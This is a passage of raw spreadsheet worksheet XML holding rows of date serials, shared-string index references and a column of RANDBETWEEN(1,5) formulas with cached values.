        <v>10</v>
      </c>
      <c r="D16560" t="s">
        <v>23</v>
      </c>
      <c r="E16560" t="s">
        <v>14912</v>
      </c>
      <c r="F16560">
        <f t="shared" ca="1" si="258"/>
        <v>3</v>
      </c>
    </row>
    <row r="16561" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16561" s="1">
        <v>43199.509722222225</v>
      </c>
      <c r="C16561" t="s">
        <v>107</v>
      </c>
      <c r="E16561" t="s">
        <v>14913</v>
      </c>
      <c r="F16561">
        <f t="shared" ca="1" si="258"/>
        <v>3</v>
      </c>
    </row>
    <row r="16562" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16562" s="1">
        <v>43199.49554398148</v>
      </c>
      <c r="C16562" t="s">
        <v>10</v>
      </c>
      <c r="D16562" t="s">
        <v>6</v>
      </c>
      <c r="E16562" t="s">
        <v>14914</v>
      </c>
      <c r="F16562">
        <f t="shared" ca="1" si="258"/>
        <v>1</v>
      </c>
    </row>
    <row r="16563" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16563" s="1">
        <v>43199.494884259257</v>
      </c>
      <c r="C16563" t="s">
        <v>10</v>
      </c>
      <c r="D16563" t="s">
        <v>46</v>
      </c>
      <c r="E16563" t="s">
        <v>14915</v>
      </c>
      <c r="F16563">
        <f t="shared" ca="1" si="258"/>
        <v>2</v>
      </c>
    </row>
    <row r="16564" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A16564" s="1">
        <v>43199.49423611111</v>
      </c>
      <c r="C16564" t="s">
        <v>10</v>
      </c>
      <c r="D16564" t="s">
        <v>39</v>
      </c>
      <c r="E16564" s="2" t="s">
        <v>14916</v>
      </c>
      <c r="F16564">
        <f t="shared" ca="1" si="258"/>
        <v>4</v>
      </c>
    </row>
    <row r="16565" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A16565" s="1">
        <v>43199.492037037038</v>
      </c>
      <c r="C16565" t="s">
        <v>10</v>
      </c>
      <c r="D16565" t="s">
        <v>6</v>
      </c>
      <c r="E16565" s="2" t="s">
        <v>14917</v>
      </c>
      <c r="F16565">
        <f t="shared" ca="1" si="258"/>
        <v>3</v>
      </c>
    </row>
    <row r="16566" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16566" s="1">
        <v>43199.48642361111</v>
      </c>
      <c r="C16566" t="s">
        <v>7058</v>
      </c>
      <c r="D16566" t="s">
        <v>107</v>
      </c>
      <c r="E16566" s="2" t="s">
        <v>14918</v>
      </c>
      <c r="F16566">
        <f t="shared" ca="1" si="258"/>
        <v>2</v>
      </c>
    </row>
    <row r="16567" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16567" s="1">
        <v>43199.486134259256</v>
      </c>
      <c r="C16567" t="s">
        <v>10</v>
      </c>
      <c r="D16567" t="s">
        <v>271</v>
      </c>
      <c r="E16567" t="s">
        <v>14919</v>
      </c>
      <c r="F16567">
        <f t="shared" ca="1" si="258"/>
        <v>3</v>
      </c>
    </row>
    <row r="16568" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16568" s="1">
        <v>43199.467557870368</v>
      </c>
      <c r="C16568" t="s">
        <v>6523</v>
      </c>
      <c r="E16568" t="s">
        <v>14920</v>
      </c>
      <c r="F16568">
        <f t="shared" ca="1" si="258"/>
        <v>5</v>
      </c>
    </row>
    <row r="16569" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16569" s="1">
        <v>43199.458344907405</v>
      </c>
      <c r="C16569" t="s">
        <v>65</v>
      </c>
      <c r="E16569" s="2" t="s">
        <v>14921</v>
      </c>
      <c r="F16569">
        <f t="shared" ca="1" si="258"/>
        <v>2</v>
      </c>
    </row>
    <row r="16570" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A16570" s="1">
        <v>43199.44636574074</v>
      </c>
      <c r="C16570" t="s">
        <v>48</v>
      </c>
      <c r="E16570" s="2" t="s">
        <v>14922</v>
      </c>
      <c r="F16570">
        <f t="shared" ca="1" si="258"/>
        <v>4</v>
      </c>
    </row>
    <row r="16571" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A16571" s="1">
        <v>43199.439050925925</v>
      </c>
      <c r="C16571" t="s">
        <v>10</v>
      </c>
      <c r="D16571" t="s">
        <v>163</v>
      </c>
      <c r="E16571" s="2" t="s">
        <v>14923</v>
      </c>
      <c r="F16571">
        <f t="shared" ca="1" si="258"/>
        <v>4</v>
      </c>
    </row>
    <row r="16572" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16572" s="1">
        <v>43199.431620370371</v>
      </c>
      <c r="C16572" t="s">
        <v>10</v>
      </c>
      <c r="D16572" t="s">
        <v>158</v>
      </c>
      <c r="E16572" t="s">
        <v>14924</v>
      </c>
      <c r="F16572">
        <f t="shared" ca="1" si="258"/>
        <v>2</v>
      </c>
    </row>
    <row r="16573" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16573" s="1">
        <v>43199.427812499998</v>
      </c>
      <c r="C16573" t="s">
        <v>10</v>
      </c>
      <c r="D16573" t="s">
        <v>151</v>
      </c>
      <c r="E16573" t="s">
        <v>14925</v>
      </c>
      <c r="F16573">
        <f t="shared" ca="1" si="258"/>
        <v>2</v>
      </c>
    </row>
    <row r="16574" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A16574" s="1">
        <v>43199.424699074072</v>
      </c>
      <c r="C16574" t="s">
        <v>65</v>
      </c>
      <c r="E16574" s="2" t="s">
        <v>14926</v>
      </c>
      <c r="F16574">
        <f t="shared" ca="1" si="258"/>
        <v>1</v>
      </c>
    </row>
    <row r="16575" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16575" s="1">
        <v>43199.407569444447</v>
      </c>
      <c r="C16575" t="s">
        <v>60</v>
      </c>
      <c r="E16575" t="s">
        <v>14927</v>
      </c>
      <c r="F16575">
        <f t="shared" ca="1" si="258"/>
        <v>4</v>
      </c>
    </row>
    <row r="16576" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16576" s="1">
        <v>43199.344953703701</v>
      </c>
      <c r="C16576" t="s">
        <v>7058</v>
      </c>
      <c r="D16576" t="s">
        <v>92</v>
      </c>
      <c r="E16576" s="2" t="s">
        <v>14928</v>
      </c>
      <c r="F16576">
        <f t="shared" ca="1" si="258"/>
        <v>1</v>
      </c>
    </row>
    <row r="16577" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A16577" s="1">
        <v>43199.317893518521</v>
      </c>
      <c r="C16577" t="s">
        <v>124</v>
      </c>
      <c r="E16577" s="2" t="s">
        <v>14929</v>
      </c>
      <c r="F16577">
        <f t="shared" ca="1" si="258"/>
        <v>2</v>
      </c>
    </row>
    <row r="16578" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A16578" s="1">
        <v>43199.31753472222</v>
      </c>
      <c r="C16578" t="s">
        <v>1812</v>
      </c>
      <c r="D16578" t="s">
        <v>67</v>
      </c>
      <c r="E16578" s="2" t="s">
        <v>14930</v>
      </c>
      <c r="F16578">
        <f t="shared" ref="F16578:F16641" ca="1" si="259">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="16579" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16579" s="1">
        <v>43199.287094907406</v>
      </c>
      <c r="C16579" t="s">
        <v>48</v>
      </c>
      <c r="E16579" t="s">
        <v>14931</v>
      </c>
      <c r="F16579">
        <f t="shared" ca="1" si="259"/>
        <v>5</v>
      </c>
    </row>
    <row r="16580" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A16580" s="1">
        <v>43199.258819444447</v>
      </c>
      <c r="C16580" t="s">
        <v>865</v>
      </c>
      <c r="D16580" t="s">
        <v>11</v>
      </c>
      <c r="E16580" s="2" t="s">
        <v>14932</v>
      </c>
      <c r="F16580">
        <f t="shared" ca="1" si="259"/>
        <v>1</v>
      </c>
    </row>
    <row r="16581" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A16581" s="1">
        <v>43199.249976851854</v>
      </c>
      <c r="C16581" t="s">
        <v>65</v>
      </c>
      <c r="E16581" s="2" t="s">
        <v>14933</v>
      </c>
      <c r="F16581">
        <f t="shared" ca="1" si="259"/>
        <v>2</v>
      </c>
    </row>
    <row r="16582" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16582" s="1">
        <v>43199.235902777778</v>
      </c>
      <c r="C16582" t="s">
        <v>48</v>
      </c>
      <c r="E16582" t="s">
        <v>14934</v>
      </c>
      <c r="F16582">
        <f t="shared" ca="1" si="259"/>
        <v>3</v>
      </c>
    </row>
    <row r="16583" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A16583" s="1">
        <v>43199.230208333334</v>
      </c>
      <c r="C16583" t="s">
        <v>497</v>
      </c>
      <c r="D16583" t="s">
        <v>33</v>
      </c>
      <c r="E16583" s="2" t="s">
        <v>14935</v>
      </c>
      <c r="F16583">
        <f t="shared" ca="1" si="259"/>
        <v>2</v>
      </c>
    </row>
    <row r="16584" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16584" s="1">
        <v>43199.22552083333</v>
      </c>
      <c r="C16584" t="s">
        <v>231</v>
      </c>
      <c r="D16584" t="s">
        <v>1056</v>
      </c>
      <c r="E16584" t="s">
        <v>14936</v>
      </c>
      <c r="F16584">
        <f t="shared" ca="1" si="259"/>
        <v>5</v>
      </c>
    </row>
    <row r="16585" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16585" s="1">
        <v>43199.215520833335</v>
      </c>
      <c r="C16585" t="s">
        <v>60</v>
      </c>
      <c r="E16585" t="s">
        <v>14937</v>
      </c>
      <c r="F16585">
        <f t="shared" ca="1" si="259"/>
        <v>3</v>
      </c>
    </row>
    <row r="16586" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A16586" s="1">
        <v>43199.214120370372</v>
      </c>
      <c r="C16586" t="s">
        <v>10</v>
      </c>
      <c r="D16586" t="s">
        <v>721</v>
      </c>
      <c r="E16586" s="2" t="s">
        <v>14938</v>
      </c>
      <c r="F16586">
        <f t="shared" ca="1" si="259"/>
        <v>4</v>
      </c>
    </row>
    <row r="16587" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16587" s="1">
        <v>43199.188460648147</v>
      </c>
      <c r="C16587" t="s">
        <v>559</v>
      </c>
      <c r="E16587" t="s">
        <v>14939</v>
      </c>
      <c r="F16587">
        <f t="shared" ca="1" si="259"/>
        <v>4</v>
      </c>
    </row>
    <row r="16588" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16588" s="1">
        <v>43199.187268518515</v>
      </c>
      <c r="C16588" t="s">
        <v>542</v>
      </c>
      <c r="E16588" t="s">
        <v>14940</v>
      </c>
      <c r="F16588">
        <f t="shared" ca="1" si="259"/>
        <v>4</v>
      </c>
    </row>
    <row r="16589" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A16589" s="1">
        <v>43199.182824074072</v>
      </c>
      <c r="C16589" t="s">
        <v>222</v>
      </c>
      <c r="D16589" t="s">
        <v>36</v>
      </c>
      <c r="E16589" s="2" t="s">
        <v>14941</v>
      </c>
      <c r="F16589">
        <f t="shared" ca="1" si="259"/>
        <v>2</v>
      </c>
    </row>
    <row r="16590" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A16590" s="1">
        <v>43199.181597222225</v>
      </c>
      <c r="C16590" t="s">
        <v>14</v>
      </c>
      <c r="D16590" t="s">
        <v>1056</v>
      </c>
      <c r="E16590" s="2" t="s">
        <v>14942</v>
      </c>
      <c r="F16590">
        <f t="shared" ca="1" si="259"/>
        <v>5</v>
      </c>
    </row>
    <row r="16591" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A16591" s="1">
        <v>43199.162280092591</v>
      </c>
      <c r="C16591" t="s">
        <v>10</v>
      </c>
      <c r="D16591" t="s">
        <v>89</v>
      </c>
      <c r="E16591" s="2" t="s">
        <v>14943</v>
      </c>
      <c r="F16591">
        <f t="shared" ca="1" si="259"/>
        <v>4</v>
      </c>
    </row>
    <row r="16592" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16592" s="1">
        <v>43199.148298611108</v>
      </c>
      <c r="C16592" t="s">
        <v>50</v>
      </c>
      <c r="E16592" t="s">
        <v>14944</v>
      </c>
      <c r="F16592">
        <f t="shared" ca="1" si="259"/>
        <v>4</v>
      </c>
    </row>
    <row r="16593" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A16593" s="1">
        <v>43199.121724537035</v>
      </c>
      <c r="C16593" t="s">
        <v>65</v>
      </c>
      <c r="E16593" s="2" t="s">
        <v>14945</v>
      </c>
      <c r="F16593">
        <f t="shared" ca="1" si="259"/>
        <v>3</v>
      </c>
    </row>
    <row r="16594" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16594" s="1">
        <v>43199.117106481484</v>
      </c>
      <c r="C16594" t="s">
        <v>10</v>
      </c>
      <c r="D16594" t="s">
        <v>6</v>
      </c>
      <c r="E16594" t="s">
        <v>14946</v>
      </c>
      <c r="F16594">
        <f t="shared" ca="1" si="259"/>
        <v>3</v>
      </c>
    </row>
    <row r="16595" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A16595" s="1">
        <v>43199.113622685189</v>
      </c>
      <c r="C16595" t="s">
        <v>2168</v>
      </c>
      <c r="D16595" t="s">
        <v>36</v>
      </c>
      <c r="E16595" s="2" t="s">
        <v>14947</v>
      </c>
      <c r="F16595">
        <f t="shared" ca="1" si="259"/>
        <v>4</v>
      </c>
    </row>
    <row r="16596" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16596" s="1">
        <v>43199.100092592591</v>
      </c>
      <c r="C16596" t="s">
        <v>103</v>
      </c>
      <c r="E16596" t="s">
        <v>14948</v>
      </c>
      <c r="F16596">
        <f t="shared" ca="1" si="259"/>
        <v>1</v>
      </c>
    </row>
    <row r="16597" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A16597" s="1">
        <v>43199.079814814817</v>
      </c>
      <c r="C16597" t="s">
        <v>140</v>
      </c>
      <c r="D16597" t="s">
        <v>46</v>
      </c>
      <c r="E16597" s="2" t="s">
        <v>14949</v>
      </c>
      <c r="F16597">
        <f t="shared" ca="1" si="259"/>
        <v>4</v>
      </c>
    </row>
    <row r="16598" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16598" s="1">
        <v>43199.06181712963</v>
      </c>
      <c r="C16598" t="s">
        <v>724</v>
      </c>
      <c r="D16598" t="s">
        <v>46</v>
      </c>
      <c r="E16598" s="2" t="s">
        <v>14950</v>
      </c>
      <c r="F16598">
        <f t="shared" ca="1" si="259"/>
        <v>2</v>
      </c>
    </row>
    <row r="16599" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A16599" s="1">
        <v>43199.042766203704</v>
      </c>
      <c r="C16599" t="s">
        <v>461</v>
      </c>
      <c r="D16599" t="s">
        <v>36</v>
      </c>
      <c r="E16599" s="2" t="s">
        <v>14951</v>
      </c>
      <c r="F16599">
        <f t="shared" ca="1" si="259"/>
        <v>1</v>
      </c>
    </row>
    <row r="16600" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A16600" s="1">
        <v>43199.037939814814</v>
      </c>
      <c r="C16600" t="s">
        <v>140</v>
      </c>
      <c r="D16600" t="s">
        <v>141</v>
      </c>
      <c r="E16600" s="2" t="s">
        <v>14952</v>
      </c>
      <c r="F16600">
        <f t="shared" ca="1" si="259"/>
        <v>4</v>
      </c>
    </row>
    <row r="16601" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A16601" s="1">
        <v>43199.003622685188</v>
      </c>
      <c r="C16601" t="s">
        <v>4852</v>
      </c>
      <c r="D16601" t="s">
        <v>713</v>
      </c>
      <c r="E16601" s="2" t="s">
        <v>14953</v>
      </c>
      <c r="F16601">
        <f t="shared" ca="1" si="259"/>
        <v>4</v>
      </c>
    </row>
    <row r="16602" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A16602" s="1">
        <v>43198.97550925926</v>
      </c>
      <c r="C16602" t="s">
        <v>318</v>
      </c>
      <c r="D16602" t="s">
        <v>36</v>
      </c>
      <c r="E16602" s="2" t="s">
        <v>14954</v>
      </c>
      <c r="F16602">
        <f t="shared" ca="1" si="259"/>
        <v>1</v>
      </c>
    </row>
    <row r="16603" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16603" s="1">
        <v>43198.951504629629</v>
      </c>
      <c r="C16603" t="s">
        <v>73</v>
      </c>
      <c r="E16603" t="s">
        <v>14955</v>
      </c>
      <c r="F16603">
        <f t="shared" ca="1" si="259"/>
        <v>4</v>
      </c>
    </row>
    <row r="16604" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16604" s="1">
        <v>43198.941388888888</v>
      </c>
      <c r="C16604" t="s">
        <v>6829</v>
      </c>
      <c r="D16604" t="s">
        <v>222</v>
      </c>
      <c r="E16604" s="2" t="s">
        <v>14956</v>
      </c>
      <c r="F16604">
        <f t="shared" ca="1" si="259"/>
        <v>2</v>
      </c>
    </row>
    <row r="16605" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16605" s="1">
        <v>43198.923391203702</v>
      </c>
      <c r="C16605" t="s">
        <v>107</v>
      </c>
      <c r="D16605" t="s">
        <v>750</v>
      </c>
      <c r="E16605" t="s">
        <v>14909</v>
      </c>
      <c r="F16605">
        <f t="shared" ca="1" si="259"/>
        <v>5</v>
      </c>
    </row>
    <row r="16606" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16606" s="1">
        <v>43198.913124999999</v>
      </c>
      <c r="C16606" t="s">
        <v>408</v>
      </c>
      <c r="F16606">
        <f t="shared" ca="1" si="259"/>
        <v>5</v>
      </c>
    </row>
    <row r="16607" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A16607" s="1">
        <v>43198.908113425925</v>
      </c>
      <c r="C16607" t="s">
        <v>3150</v>
      </c>
      <c r="D16607" t="s">
        <v>36</v>
      </c>
      <c r="E16607" s="2" t="s">
        <v>14957</v>
      </c>
      <c r="F16607">
        <f t="shared" ca="1" si="259"/>
        <v>3</v>
      </c>
    </row>
    <row r="16608" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A16608" s="1">
        <v>43198.846099537041</v>
      </c>
      <c r="C16608" t="s">
        <v>7419</v>
      </c>
      <c r="D16608" t="s">
        <v>36</v>
      </c>
      <c r="E16608" s="2" t="s">
        <v>14958</v>
      </c>
      <c r="F16608">
        <f t="shared" ca="1" si="259"/>
        <v>4</v>
      </c>
    </row>
    <row r="16609" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16609" s="1">
        <v>43198.844224537039</v>
      </c>
      <c r="C16609" t="s">
        <v>6</v>
      </c>
      <c r="D16609" t="s">
        <v>25</v>
      </c>
      <c r="E16609" t="s">
        <v>14959</v>
      </c>
      <c r="F16609">
        <f t="shared" ca="1" si="259"/>
        <v>4</v>
      </c>
    </row>
    <row r="16610" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A16610" s="1">
        <v>43198.784421296295</v>
      </c>
      <c r="C16610" t="s">
        <v>6531</v>
      </c>
      <c r="D16610" t="s">
        <v>36</v>
      </c>
      <c r="E16610" s="2" t="s">
        <v>14960</v>
      </c>
      <c r="F16610">
        <f t="shared" ca="1" si="259"/>
        <v>3</v>
      </c>
    </row>
    <row r="16611" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16611" s="1">
        <v>43198.728668981479</v>
      </c>
      <c r="C16611" t="s">
        <v>319</v>
      </c>
      <c r="D16611" t="s">
        <v>14961</v>
      </c>
      <c r="F16611">
        <f t="shared" ca="1" si="259"/>
        <v>2</v>
      </c>
    </row>
    <row r="16612" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16612" s="1">
        <v>43198.722129629627</v>
      </c>
      <c r="C16612" t="s">
        <v>107</v>
      </c>
      <c r="D16612" t="s">
        <v>71</v>
      </c>
      <c r="E16612" t="s">
        <v>14909</v>
      </c>
      <c r="F16612">
        <f t="shared" ca="1" si="259"/>
        <v>1</v>
      </c>
    </row>
    <row r="16613" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A16613" s="1">
        <v>43198.648032407407</v>
      </c>
      <c r="C16613" t="s">
        <v>4508</v>
      </c>
      <c r="D16613" t="s">
        <v>251</v>
      </c>
      <c r="E16613" s="2" t="s">
        <v>14962</v>
      </c>
      <c r="F16613">
        <f t="shared" ca="1" si="259"/>
        <v>5</v>
      </c>
    </row>
    <row r="16614" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16614" s="1">
        <v>43198.543449074074</v>
      </c>
      <c r="C16614" t="s">
        <v>41</v>
      </c>
      <c r="E16614" t="s">
        <v>14963</v>
      </c>
      <c r="F16614">
        <f t="shared" ca="1" si="259"/>
        <v>1</v>
      </c>
    </row>
    <row r="16615" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16615" s="1">
        <v>43198.512997685182</v>
      </c>
      <c r="C16615" t="s">
        <v>231</v>
      </c>
      <c r="D16615" t="s">
        <v>1160</v>
      </c>
      <c r="E16615" t="s">
        <v>14936</v>
      </c>
      <c r="F16615">
        <f t="shared" ca="1" si="259"/>
        <v>1</v>
      </c>
    </row>
    <row r="16616" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A16616" s="1">
        <v>43198.434074074074</v>
      </c>
      <c r="C16616" t="s">
        <v>565</v>
      </c>
      <c r="D16616" t="s">
        <v>124</v>
      </c>
      <c r="E16616" s="2" t="s">
        <v>14964</v>
      </c>
      <c r="F16616">
        <f t="shared" ca="1" si="259"/>
        <v>5</v>
      </c>
    </row>
    <row r="16617" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16617" s="1">
        <v>43198.387662037036</v>
      </c>
      <c r="C16617" t="s">
        <v>686</v>
      </c>
      <c r="E16617" t="s">
        <v>14965</v>
      </c>
      <c r="F16617">
        <f t="shared" ca="1" si="259"/>
        <v>5</v>
      </c>
    </row>
    <row r="16618" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16618" s="1">
        <v>43198.384733796294</v>
      </c>
      <c r="C16618" t="s">
        <v>107</v>
      </c>
      <c r="D16618" t="s">
        <v>480</v>
      </c>
      <c r="E16618" t="s">
        <v>14909</v>
      </c>
      <c r="F16618">
        <f t="shared" ca="1" si="259"/>
        <v>3</v>
      </c>
    </row>
    <row r="16619" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16619" s="1">
        <v>43198.31795138889</v>
      </c>
      <c r="C16619" t="s">
        <v>107</v>
      </c>
      <c r="D16619" t="s">
        <v>20</v>
      </c>
      <c r="E16619" t="s">
        <v>14909</v>
      </c>
      <c r="F16619">
        <f t="shared" ca="1" si="259"/>
        <v>3</v>
      </c>
    </row>
    <row r="16620" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A16620" s="1">
        <v>43198.232291666667</v>
      </c>
      <c r="C16620" t="s">
        <v>6230</v>
      </c>
      <c r="D16620" t="s">
        <v>885</v>
      </c>
      <c r="E16620" s="2" t="s">
        <v>14966</v>
      </c>
      <c r="F16620">
        <f t="shared" ca="1" si="259"/>
        <v>2</v>
      </c>
    </row>
    <row r="16621" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16621" s="1">
        <v>43198.194918981484</v>
      </c>
      <c r="C16621" t="s">
        <v>1510</v>
      </c>
      <c r="D16621" t="s">
        <v>271</v>
      </c>
      <c r="E16621" s="2" t="s">
        <v>14967</v>
      </c>
      <c r="F16621">
        <f t="shared" ca="1" si="259"/>
        <v>4</v>
      </c>
    </row>
    <row r="16622" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16622" s="1">
        <v>43198.187141203707</v>
      </c>
      <c r="C16622" t="s">
        <v>41</v>
      </c>
      <c r="E16622" t="s">
        <v>14968</v>
      </c>
      <c r="F16622">
        <f t="shared" ca="1" si="259"/>
        <v>3</v>
      </c>
    </row>
    <row r="16623" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A16623" s="1">
        <v>43198.176469907405</v>
      </c>
      <c r="C16623" t="s">
        <v>41</v>
      </c>
      <c r="E16623" s="2" t="s">
        <v>14969</v>
      </c>
      <c r="F16623">
        <f t="shared" ca="1" si="259"/>
        <v>1</v>
      </c>
    </row>
    <row r="16624" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16624" s="1">
        <v>43198.12699074074</v>
      </c>
      <c r="C16624" t="s">
        <v>107</v>
      </c>
      <c r="D16624" t="s">
        <v>114</v>
      </c>
      <c r="E16624" t="s">
        <v>14909</v>
      </c>
      <c r="F16624">
        <f t="shared" ca="1" si="259"/>
        <v>4</v>
      </c>
    </row>
    <row r="16625" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16625" s="1">
        <v>43198.120775462965</v>
      </c>
      <c r="C16625" t="s">
        <v>1510</v>
      </c>
      <c r="D16625" t="s">
        <v>222</v>
      </c>
      <c r="E16625" s="2" t="s">
        <v>14970</v>
      </c>
      <c r="F16625">
        <f t="shared" ca="1" si="259"/>
        <v>3</v>
      </c>
    </row>
    <row r="16626" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16626" s="1">
        <v>43198.111504629633</v>
      </c>
      <c r="C16626" t="s">
        <v>5361</v>
      </c>
      <c r="D16626" t="s">
        <v>20</v>
      </c>
      <c r="E16626" s="2" t="s">
        <v>14971</v>
      </c>
      <c r="F16626">
        <f t="shared" ca="1" si="259"/>
        <v>1</v>
      </c>
    </row>
    <row r="16627" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16627" s="1">
        <v>43198.104166666664</v>
      </c>
      <c r="C16627" t="s">
        <v>231</v>
      </c>
      <c r="D16627" t="s">
        <v>107</v>
      </c>
      <c r="E16627" t="s">
        <v>14936</v>
      </c>
      <c r="F16627">
        <f t="shared" ca="1" si="259"/>
        <v>2</v>
      </c>
    </row>
    <row r="16628" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A16628" s="1">
        <v>43197.995868055557</v>
      </c>
      <c r="C16628" t="s">
        <v>4852</v>
      </c>
      <c r="D16628" t="s">
        <v>1056</v>
      </c>
      <c r="E16628" s="2" t="s">
        <v>14972</v>
      </c>
      <c r="F16628">
        <f t="shared" ca="1" si="259"/>
        <v>5</v>
      </c>
    </row>
    <row r="16629" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A16629" s="1">
        <v>43197.877743055556</v>
      </c>
      <c r="C16629" t="s">
        <v>2986</v>
      </c>
      <c r="D16629" t="s">
        <v>11</v>
      </c>
      <c r="E16629" s="2" t="s">
        <v>14973</v>
      </c>
      <c r="F16629">
        <f t="shared" ca="1" si="259"/>
        <v>2</v>
      </c>
    </row>
    <row r="16630" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16630" s="1">
        <v>43197.868159722224</v>
      </c>
      <c r="C16630" t="s">
        <v>10</v>
      </c>
      <c r="D16630" t="s">
        <v>222</v>
      </c>
      <c r="E16630" t="s">
        <v>14974</v>
      </c>
      <c r="F16630">
        <f t="shared" ca="1" si="259"/>
        <v>4</v>
      </c>
    </row>
    <row r="16631" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16631" s="1">
        <v>43197.862303240741</v>
      </c>
      <c r="C16631" t="s">
        <v>271</v>
      </c>
      <c r="D16631" t="s">
        <v>41</v>
      </c>
      <c r="E16631" t="s">
        <v>14975</v>
      </c>
      <c r="F16631">
        <f t="shared" ca="1" si="259"/>
        <v>1</v>
      </c>
    </row>
    <row r="16632" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16632" s="1">
        <v>43197.785682870373</v>
      </c>
      <c r="C16632" t="s">
        <v>5361</v>
      </c>
      <c r="D16632" t="s">
        <v>82</v>
      </c>
      <c r="E16632" s="2" t="s">
        <v>14976</v>
      </c>
      <c r="F16632">
        <f t="shared" ca="1" si="259"/>
        <v>5</v>
      </c>
    </row>
    <row r="16633" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A16633" s="1">
        <v>43197.776736111111</v>
      </c>
      <c r="C16633" t="s">
        <v>454</v>
      </c>
      <c r="D16633" t="s">
        <v>163</v>
      </c>
      <c r="E16633" s="2" t="s">
        <v>14977</v>
      </c>
      <c r="F16633">
        <f t="shared" ca="1" si="259"/>
        <v>1</v>
      </c>
    </row>
    <row r="16634" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16634" s="1">
        <v>43197.762048611112</v>
      </c>
      <c r="C16634" t="s">
        <v>1510</v>
      </c>
      <c r="D16634" t="s">
        <v>374</v>
      </c>
      <c r="E16634" s="2" t="s">
        <v>14978</v>
      </c>
      <c r="F16634">
        <f t="shared" ca="1" si="259"/>
        <v>4</v>
      </c>
    </row>
    <row r="16635" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16635" s="1">
        <v>43197.593275462961</v>
      </c>
      <c r="C16635" t="s">
        <v>107</v>
      </c>
      <c r="D16635" t="s">
        <v>336</v>
      </c>
      <c r="E16635" t="s">
        <v>14909</v>
      </c>
      <c r="F16635">
        <f t="shared" ca="1" si="259"/>
        <v>3</v>
      </c>
    </row>
    <row r="16636" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A16636" s="1">
        <v>43197.577627314815</v>
      </c>
      <c r="C16636" t="s">
        <v>41</v>
      </c>
      <c r="E16636" s="2" t="s">
        <v>14979</v>
      </c>
      <c r="F16636">
        <f t="shared" ca="1" si="259"/>
        <v>4</v>
      </c>
    </row>
